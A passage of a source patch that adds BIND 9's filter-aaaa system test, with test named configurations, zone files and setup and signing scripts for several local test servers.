file distributed with this work for additional + * information regarding copyright ownership. + */ + +view myview { + plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 no; + filter-aaaa { any; }; + }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/bad4.conf b/bin/tests/system/filter-aaaa/conf/bad4.conf new file mode 100644 index 0000000..a65b367 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/bad4.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view myview { + plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { none; }; + }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/bad5.conf b/bin/tests/system/filter-aaaa/conf/bad5.conf new file mode 100644 index 0000000..e26564b --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/bad5.conf @@ -0,0 +1,21 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { 1.0.0.0/8; }; +}; + +view myview { + match-clients { any; }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/good1.conf b/bin/tests/system/filter-aaaa/conf/good1.conf new file mode 100644 index 0000000..9203a13 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/good1.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; +}; diff --git a/bin/tests/system/filter-aaaa/conf/good2.conf b/bin/tests/system/filter-aaaa/conf/good2.conf new file mode 100644 index 0000000..b6159b1 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/good2.conf @@ -0,0 +1,16 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 break-dnssec; +}; diff --git a/bin/tests/system/filter-aaaa/conf/good3.conf b/bin/tests/system/filter-aaaa/conf/good3.conf new file mode 100644 index 0000000..7aad386 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/good3.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 break-dnssec; + filter-aaaa { 1.0.0.0/8; }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/good4.conf b/bin/tests/system/filter-aaaa/conf/good4.conf new file mode 100644 index 0000000..0161282 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/good4.conf @@ -0,0 +1,17 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { 1.0.0.0/8; }; +}; diff --git a/bin/tests/system/filter-aaaa/conf/good5.conf b/bin/tests/system/filter-aaaa/conf/good5.conf new file mode 100644 index 0000000..a88b003 --- /dev/null +++ b/bin/tests/system/filter-aaaa/conf/good5.conf @@ -0,0 +1,19 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +view myview { + plugin query "../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { 1.0.0.0/8; }; + }; +}; diff --git a/bin/tests/system/filter-aaaa/ns1/named1.conf.in b/bin/tests/system/filter-aaaa/ns1/named1.conf.in new file mode 100644 index 0000000..381241a --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns1/named1.conf.in @@ -0,0 +1,47 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { fd92:7065:b8e:ffff::1; }; + recursion no; + dnssec-validation yes; + notify yes; + minimal-responses no; +}; + +acl filterees { 10.53.0.1; }; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { filterees; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + + +zone "." { type primary; file "root.db"; }; +zone "signed" { type primary; file "signed.db.signed"; }; +zone "unsigned" { type primary; file "unsigned.db"; }; diff --git a/bin/tests/system/filter-aaaa/ns1/named2.conf.in b/bin/tests/system/filter-aaaa/ns1/named2.conf.in new file mode 100644 index 0000000..bebb8d0 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns1/named2.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { fd92:7065:b8e:ffff::1; }; + recursion no; + dnssec-validation yes; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v6 yes; + filter-aaaa { fd92:7065:b8e:ffff::1; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type primary; file "root.db"; }; +zone "signed" { type primary; file "signed.db.signed"; }; +zone "unsigned" { type primary; file "unsigned.db"; }; diff --git a/bin/tests/system/filter-aaaa/ns1/root.db b/bin/tests/system/filter-aaaa/ns1/root.db new file mode 100644 index 0000000..150aa72 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns1/root.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA ns.utld hostmaster.ns.utld ( 1 3600 1200 604800 60 ) +@ NS ns.utld +ns.utld A 10.53.0.1 +ns.utld AAAA fd92:7065:b8e:ffff::1 +; + +signed NS ns.signed +ns.signed A 10.53.0.1 +ns.signed AAAA fd92:7065:b8e:ffff::1 + +unsigned NS ns.unsigned +ns.unsigned A 10.53.0.1 +ns.unsigned AAAA fd92:7065:b8e:ffff::1 diff --git a/bin/tests/system/filter-aaaa/ns1/sign.sh b/bin/tests/system/filter-aaaa/ns1/sign.sh new file mode 100755 index 0000000..71e5ecc --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns1/sign.sh @@ -0,0 +1,35 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +SYSTESTDIR=filter-aaaa + +zone=signed. +infile=signed.db.in +zonefile=signed.db.signed +outfile=signed.db.signed + +$KEYGEN -a $DEFAULT_ALGORITHM $zone 2>&1 > /dev/null | cat_i +$KEYGEN -f KSK -a $DEFAULT_ALGORITHM $zone 2>&1 > keygen.out | cat_i +keyname=`cat keygen.out` +rm -f keygen.out + +keyfile_to_static_ds $keyname > trusted.conf +cp trusted.conf ../ns2/trusted.conf +cp trusted.conf ../ns3/trusted.conf +cp trusted.conf ../ns5/trusted.conf + +$SIGNER -S -o $zone -f $outfile $infile > /dev/null 2> signer.err || cat signer.err +echo_i "signed zone '$zone'" diff --git a/bin/tests/system/filter-aaaa/ns1/signed.db.in b/bin/tests/system/filter-aaaa/ns1/signed.db.in new file mode 100644 index 0000000..36a0373 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns1/signed.db.in @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA ns.signed. hostmaster.ns.signed. ( 1 3600 1200 604800 60 ) +@ NS ns +@ MX 10 mx + +ns A 10.53.0.1 + AAAA fd92:7065:b8e:ffff::1 + +a-only NS 1.0.0.1 +aaaa-only AAAA 2001:db8::2 +dual A 1.0.0.3 +dual AAAA 2001:db8::3 +mx A 1.0.0.3 +mx AAAA 2001:db8::3 diff --git a/bin/tests/system/filter-aaaa/ns1/unsigned.db b/bin/tests/system/filter-aaaa/ns1/unsigned.db new file mode 100644 index 0000000..abc3947 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns1/unsigned.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA ns.unsigned. hostmaster.ns.unsigned. ( 1 3600 1200 604800 60 ) +@ NS ns +@ MX 10 mx + +ns A 10.53.0.1 + AAAA fd92:7065:b8e:ffff::1 + +a-only NS 1.0.0.4 +aaaa-only AAAA 2001:db8::5 +dual A 1.0.0.6 +dual AAAA 2001:db8::6 +mx A 1.0.0.3 +mx AAAA 2001:db8::3 diff --git a/bin/tests/system/filter-aaaa/ns2/hints b/bin/tests/system/filter-aaaa/ns2/hints new file mode 100644 index 0000000..fa0d3e4 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns2/hints @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 + +. NS ns.utld. +ns.utld. A 10.53.0.1 +ns.utld. AAAA fd92:7065:b8e:ffff::1 diff --git a/bin/tests/system/filter-aaaa/ns2/named1.conf.in b/bin/tests/system/filter-aaaa/ns2/named1.conf.in new file mode 100644 index 0000000..6cac8e5 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns2/named1.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion yes; + dnssec-validation yes; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 yes; + filter-aaaa { 10.53.0.2; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints"; }; + +include "trusted.conf"; diff --git a/bin/tests/system/filter-aaaa/ns2/named2.conf.in b/bin/tests/system/filter-aaaa/ns2/named2.conf.in new file mode 100644 index 0000000..2107b7a --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns2/named2.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + recursion yes; + dnssec-validation yes; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v6 yes; + filter-aaaa { fd92:7065:b8e:ffff::2; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints"; }; + +include "trusted.conf"; diff --git a/bin/tests/system/filter-aaaa/ns3/hints b/bin/tests/system/filter-aaaa/ns3/hints new file mode 100644 index 0000000..fa0d3e4 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns3/hints @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 + +. NS ns.utld. +ns.utld. A 10.53.0.1 +ns.utld. AAAA fd92:7065:b8e:ffff::1 diff --git a/bin/tests/system/filter-aaaa/ns3/named1.conf.in b/bin/tests/system/filter-aaaa/ns3/named1.conf.in new file mode 100644 index 0000000..cd156f4 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns3/named1.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { fd92:7065:b8e:ffff::3; }; + recursion yes; + dnssec-validation yes; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 break-dnssec; + filter-aaaa { 10.53.0.3; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints"; }; + +include "trusted.conf"; diff --git a/bin/tests/system/filter-aaaa/ns3/named2.conf.in b/bin/tests/system/filter-aaaa/ns3/named2.conf.in new file mode 100644 index 0000000..6117849 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns3/named2.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { fd92:7065:b8e:ffff::3; }; + recursion yes; + dnssec-validation yes; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v6 break-dnssec; + filter-aaaa { fd92:7065:b8e:ffff::3; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints"; }; + +include "trusted.conf"; diff --git a/bin/tests/system/filter-aaaa/ns4/named1.conf.in b/bin/tests/system/filter-aaaa/ns4/named1.conf.in new file mode 100644 index 0000000..d47a71d --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns4/named1.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { fd92:7065:b8e:ffff::4; }; + recursion no; + dnssec-validation no; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 break-dnssec; + filter-aaaa { 10.53.0.4; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type primary; file "root.db"; }; +zone "signed" { type primary; file "signed.db.signed"; }; +zone "unsigned" { type primary; file "unsigned.db"; }; diff --git a/bin/tests/system/filter-aaaa/ns4/named2.conf.in b/bin/tests/system/filter-aaaa/ns4/named2.conf.in new file mode 100644 index 0000000..5a06ec3 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns4/named2.conf.in @@ -0,0 +1,44 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { fd92:7065:b8e:ffff::4; }; + recursion no; + dnssec-validation no; + notify yes; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v6 break-dnssec; + filter-aaaa { fd92:7065:b8e:ffff::4; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type primary; file "root.db"; }; +zone "signed" { type primary; file "signed.db.signed"; }; +zone "unsigned" { type primary; file "unsigned.db"; }; diff --git a/bin/tests/system/filter-aaaa/ns4/root.db b/bin/tests/system/filter-aaaa/ns4/root.db new file mode 100644 index 0000000..7984c37 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns4/root.db @@ -0,0 +1,24 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ SOA ns.utld hostmaster.ns.utld ( 1 3600 1200 604800 60 ) +@ NS ns.utld +ns.utld A 10.53.0.4 +ns.utld AAAA fd92:7065:b8e:ffff::4 +; + +signed NS ns.signed +ns.signed A 10.53.0.4 +ns.signed AAAA fd92:7065:b8e:ffff::4 + +unsigned NS ns.unsigned +ns.unsigned A 10.53.0.4 +ns.unsigned AAAA fd92:7065:b8e:ffff::4 diff --git a/bin/tests/system/filter-aaaa/ns4/sign.sh b/bin/tests/system/filter-aaaa/ns4/sign.sh new file mode 100755 index 0000000..f07d85b --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns4/sign.sh @@ -0,0 +1,28 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=../.. +. $SYSTEMTESTTOP/conf.sh + +SYSTESTDIR=filter-aaaa + +zone=signed. +infile=signed.db.in +zonefile=signed.db.signed +outfile=signed.db.signed + +$KEYGEN -a $DEFAULT_ALGORITHM $zone 2>&1 > /dev/null | cat_i +$KEYGEN -f KSK -a $DEFAULT_ALGORITHM $zone 2>&1 > /dev/null | cat_i + +$SIGNER -S -o $zone -f $outfile $infile > /dev/null 2> signer.err || cat signer.err +echo_i "signed zone '$zone'" diff --git a/bin/tests/system/filter-aaaa/ns4/signed.db.in b/bin/tests/system/filter-aaaa/ns4/signed.db.in new file mode 100644 index 0000000..fa52106 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns4/signed.db.in @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA ns.signed. hostmaster.ns.signed. ( 1 3600 1200 604800 60 ) +@ NS ns +@ MX 10 mx + +ns A 10.53.0.4 + AAAA fd92:7065:b8e:ffff::4 + +a-only NS 1.0.0.1 +aaaa-only AAAA 2001:db8::2 +dual A 1.0.0.3 +dual AAAA 2001:db8::3 +mx A 1.0.0.3 +mx AAAA 2001:db8::3 diff --git a/bin/tests/system/filter-aaaa/ns4/unsigned.db b/bin/tests/system/filter-aaaa/ns4/unsigned.db new file mode 100644 index 0000000..4baa462 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns4/unsigned.db @@ -0,0 +1,25 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 +@ SOA ns.unsigned. hostmaster.ns.unsigned. ( 1 3600 1200 604800 60 ) +@ NS ns +@ MX 10 mx + +ns A 10.53.0.4 + AAAA fd92:7065:b8e:ffff::4 + +a-only NS 1.0.0.4 +aaaa-only AAAA 2001:db8::5 +dual A 1.0.0.6 +dual AAAA 2001:db8::6 +mx A 1.0.0.3 +mx AAAA 2001:db8::3 diff --git a/bin/tests/system/filter-aaaa/ns5/hints b/bin/tests/system/filter-aaaa/ns5/hints new file mode 100644 index 0000000..fa0d3e4 --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns5/hints @@ -0,0 +1,16 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 120 + +. NS ns.utld. +ns.utld. A 10.53.0.1 +ns.utld. AAAA fd92:7065:b8e:ffff::1 diff --git a/bin/tests/system/filter-aaaa/ns5/named.conf.in b/bin/tests/system/filter-aaaa/ns5/named.conf.in new file mode 100644 index 0000000..0584bcf --- /dev/null +++ b/bin/tests/system/filter-aaaa/ns5/named.conf.in @@ -0,0 +1,49 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { fd92:7065:b8e:ffff::5; }; + recursion yes; + dnssec-validation no; + notify yes; + dns64 64:ff9b::/96 { + clients { any; }; + exclude { any; }; + mapped { any; }; + }; + minimal-responses no; +}; + +plugin query "../../../../plugins/lib/filter-aaaa.so" { + filter-aaaa-on-v4 break-dnssec; + filter-aaaa { any; }; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "." { type hint; file "hints"; }; + +include "trusted.conf"; diff --git a/bin/tests/system/filter-aaaa/prereq.sh b/bin/tests/system/filter-aaaa/prereq.sh new file mode 100644 index 0000000..4b7058b --- /dev/null +++ b/bin/tests/system/filter-aaaa/prereq.sh @@ -0,0 +1,27 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$FEATURETEST --have-dlopen || { + echo_i "dlopen() not supported - skipping filter-aaaa test" + exit 255 +} + +$FEATURETEST --tsan && { + echo_i "TSAN - skipping dlzexternal test" + exit 255 +} + +exit 0 diff --git a/bin/tests/system/filter-aaaa/setup.sh b/bin/tests/system/filter-aaaa/setup.sh new file mode 100644 index 0000000..55ef60b --- /dev/null +++ b/bin/tests/system/filter-aaaa/setup.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding 